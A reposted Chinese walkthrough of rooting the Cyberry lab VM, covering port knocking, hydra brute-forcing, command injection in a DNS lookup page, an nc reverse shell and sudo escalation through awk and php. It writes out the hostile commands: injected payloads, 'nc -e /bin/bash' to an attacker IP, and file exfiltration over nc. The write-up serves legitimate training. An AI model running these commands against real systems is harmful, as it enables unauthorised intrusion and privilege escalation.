Cyberry靶机渗透测试

栏目: 编程工具 · 发布时间: 6年前

内容简介:靶机ip:192.168.107.132攻击机kali:192.168.107.134

Cyberry靶机渗透测试

环境准备

靶机ip:192.168.107.132

攻击机kali:192.168.107.134

说明:目的是拿下靶机并获取root权限

渗透测试

首先nmap开路,找一下靶机的ip地址 nmap -sP 192.168.107.1/24 Cyberry靶机渗透测试 既然确定了ip,接着我们扫一下端口。 Cyberry靶机渗透测试 开了三个端口,1个web端口80,1个ssh端口22,1个ftp端口21.我们先从web服务开始。 Cyberry靶机渗透测试 一个静态页面,没什么搞头,扫一下目录。 Cyberry靶机渗透测试 我先从phpmyadmin下手, Cyberry靶机渗透测试 这里尝试爆破弱口令,结果失败,看来不是从这里入手,接着去/login.php界面看看,试了半天,好像也不是什么注入,结果发现这里有点东西, Cyberry靶机渗透测试 点进去, Cyberry靶机渗透测试 前面几个点进去是404,这一个就有东西了, Cyberry靶机渗透测试 这样一张图片。用图片编辑器调一下, Cyberry靶机渗透测试 这里就很有意思了,有四个人,最上方还有一部分,出现了PORT字样,一时半会有些蒙蔽,但是显然这个靶机入口就在这里了(总不会无缘无故给一张这样的图吧- -)。然后,我分别把这四个人截图下来,用浏览器的识别功能去查了这四个人,了解了一下各个人的信息,这四个人分别是Smiley Lewis, Dave Edmunds, Fats Domino和Gale Storm,首先,他们都是艺术家,都演奏了同一首歌曲,名字叫,”I hear you knocking”,年份分别是,1970,1955,1955,1961,这差不多是共同点了,还是很蒙蔽0.0,这里结合了知识面和脑洞。。原来跟knock有关,linux下有个命令knock可供安装使用, 端口试探(port knocking) 是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机,知道这个就明白上面那个PORT的意思了,显然是有某个端口没有被打开,需要我们knock开。那年份就要用上了,从左上依次到右下 knock 192.168.107.132 1970 1955 1955 1961 。knock之后,再来扫描端口,从1-65535 Cyberry靶机渗透测试 发现了一个端口开放了,我们访问, Cyberry靶机渗透测试 还是这个页面,但是既然端口不一样,那肯定存在的页面也会有差异,我们这次使用kali下的dirb扫描目录, Cyberry靶机渗透测试 这里,多了个H目录,访问, Cyberry靶机渗透测试 这种语言在CTF中见过,brain-fuck,于是乎,Google一个在线翻译,解密,内容如下, Cyberry靶机渗透测试 明显上面几个是用户名,下面pw那个是密码,想到前面开了ftp和ssh,把目标转向了ssh和ftp,先看看能不能登陆ssh,这里我用hydra进行爆破,先把刚才的用户名和密码保存在本地 Cyberry靶机渗透测试 .hydra命令如下, hydra -L /root/user.txt -P /root/pw.txt ssh://192.168.107.132 -t 6 Cyberry靶机渗透测试 爆破成功,直接去登陆ssh, ssh mary@192.168.107.132 。结果登不进去 Cyberry靶机渗透测试 被墙了?不知道。。总之就是我们被拒绝了,ssh这条路看来走不通了。。。换个思路,爆破ftp。 Cyberry靶机渗透测试 还是这个用户名和密码, ftp 192.168.107.132 Cyberry靶机渗透测试 成功登陆,接着,用 ls -la 看看文件, Cyberry靶机渗透测试 在.bash_history目录,发现有两个文件,get到kali本地,命令, get .trash get .reminder.enc 。接着到本地看看文件类型, Cyberry靶机渗透测试 一个是openssl enc加密,一个是文本,我们看看文本内容 Cyberry靶机渗透测试 应该就是密码了,网上找了个脚本,直接放在命令行用,

for i in `openssl enc -ciphers | tail -n +2` ; do for j in `cat .trash`; do openssl ${i:1} -d -salt -md md5 -in .reminder.enc -out "decrypted$i$j" -k $j; done;done 2>/dev/null
Cyberry靶机渗透测试 解密完后, Cyberry靶机渗透测试 找一下我们想要的文本文件, file * | grep "text" Cyberry靶机渗透测试 cat 查看一下, Cyberry靶机渗透测试 这个dangleberry69大概就是什么登陆密码,好像暂时没什么地方用到登陆了,别忘了我们web网站上还有一个登陆处,用mary和拿到的密码去登陆一下, http://192.168.107.132:61955/login.php Cyberry靶机渗透测试 登陆成功,页面有两个链接,第一个就是一个视频播放,没什么用,第二个是个DNS解析的页面。 Cyberry靶机渗透测试 只给了一个yahoo和google,看着像是一个代码执行的洞,我尝试在前台修改一下,看看能不能执行其他的东西 Cyberry靶机渗透测试 修改,添加 google;whoami 。然后,提交 Cyberry靶机渗透测试 果然,执行了代码,这样,我便想反弹一个shell,先在攻击机上执行 nc -lvp 4444 Cyberry靶机渗透测试 接着,在前台修改value值为 google;nc -e /bin/bash 192.168.107.133 4444 Cyberry靶机渗透测试 等几秒钟,查看攻击机 Cyberry靶机渗透测试 已经反弹到 shell 了,看着很不舒服,用 python 引入一个交互式shell, python -c "import pty;pty.spawn('/bin/bash')" Cyberry靶机渗透测试 查看当前目录下的文件,有个nb-latin,查看内容 Cyberry靶机渗透测试 看着要不是用户名,要不就是密码,先下载到攻击机上,shell上命令 nc -w 3 192.168.107.132 4444< nb-latin kali终端上 nc -lvp 4444 > pass.txtCyberry靶机渗透测试 用之前的用户名字典和这个密码字典试试ssh登陆,还是上hydra, hydra -L /root/user.txt -P /root/pass.txt ssh://192.168.107.132 -t 6 Cyberry靶机渗透测试

登陆ssh,这下成功了,没有出错,看下文件,运行sh

Cyberry靶机渗透测试 发现我们基本上没有权限,什么都运行不了,应该会有个地方有权限的设定,于是想到了 sudo -l 命令,列出目前用户可执行的指令, Cyberry靶机渗透测试 确实,我们可以用terry的权限去执行刚才那两个我们没有权限的文件,命令 sudo -u terrt ./invoke.sh , Cyberry靶机渗透测试 通过测试,我发现需要带一个参数,而且这个参数是将要被打开的文件 ,我试着把参数改为/bin/bash,发现,我们用户切换为terry了 Cyberry靶机渗透测试 同样,用上面的方法 sudo -l ,发现有一个文件可以用halle的权限去执行, Cyberry靶机渗透测试 这里的这个文件是awk,awk是 linux 下一种文本处理工具,有他自己的语法,按照这个思路,我们需要通过awk的命令,将用户变为halle,用BEGIN命令,引入system全局变量,执行/bin/bash, sudo -u halle awk 'BEGIN{system("/bin/bash")}' ,发现我们已经变成halle了, Cyberry靶机渗透测试 再进行 sudo -l , Cyberry靶机渗透测试 halle可以用chuck的权限执行php,这里踩坑了,最后做法是,我们写一个 php 文件去执行系统命令,然后用php文件去读chuck目录下的文件,先将文件写入/tmp目录,因为/tmp目录一般来说都可以读, echo "<?php system('ls -la /home/chuck')?>" > /tmp/1.php ,然后用 sudo -u chuck /usr/bin/php /tmp/1.php 执行,可以发现执行成功了。(注意,直接打开/tmp/1.php是没有权限的,只有用chuck的身份去打开) Cyberry靶机渗透测试 我们再去写一个读.deleted目录下的文件, echo "<?php system('ls -la /home/chuck/.deleted')?>" > /tmp/1.php .接着 sudo -u chuck /usr/bin/php /tmp/1.php .执行, Cyberry靶机渗透测试 有两个文件,先看看ssh_stuff里有什么, Cyberry靶机渗透测试 发现了rsa公钥,但没法进行免密登陆ssh,我们条件没法实现,所以看看另一个文件deleted, Cyberry靶机渗透测试 打开后,发现了类似密码的邮件, Cyberry靶机渗透测试 Cyberry靶机渗透测试 右侧文本文件是我自己创建的记录,开头是che,结尾是rry,中间有baca,还有一些字母出现次数的说明,那么接下来就是爆破密码了,直接暴力,用kali下的自带工具 crunch 生成密码 Cyberry靶机渗透测试 由于文件有点大,先生成好,再把他们合成为一个文件。 Cyberry靶机渗透测试 接着用hydra爆破。爆了一万年。。 Cyberry靶机渗透测试 接着直接登陆ssh, Cyberry靶机渗透测试

可以看到已经是root了,至此靶机提升root已完成。

参考链接

http://www.sohu.com/a/161766202_709042 【tty交互式shell】

https://en.wikipedia.org/wiki/Port_knocking 【Port_knocking】

http://www.runoob.com/linux/linux-comm-awk.html 【awk】


以上所述就是小编给大家介绍的《Cyberry靶机渗透测试》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Java核心技术·卷1:基础知识(原书第9版)

Java核心技术·卷1:基础知识(原书第9版)

(美)Cay S. Horstmann、(美)Gary Cornell / 周立新、陈波、叶乃文、邝劲筠、杜永萍 / 机械工业出版社 / 2013-11-1 / 119.00

Java领域最有影响力和价值的著作之一,拥有20多年教学与研究经验的资深Java技术专家撰写(获Jolt大奖),与《Java编程思想》齐名,10余年全球畅销不衰,广受好评。第9版根据JavaSE7全面更新,同时修正了第8版中的不足,系统全面讲解Java语言的核心概念、语法、重要特性和开发方法,包含大量案例,实践性强。 《Java核心技术·卷1:基础知识》共14章。第1章概述了Java语言与其......一起来看看 《Java核心技术·卷1:基础知识(原书第9版)》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码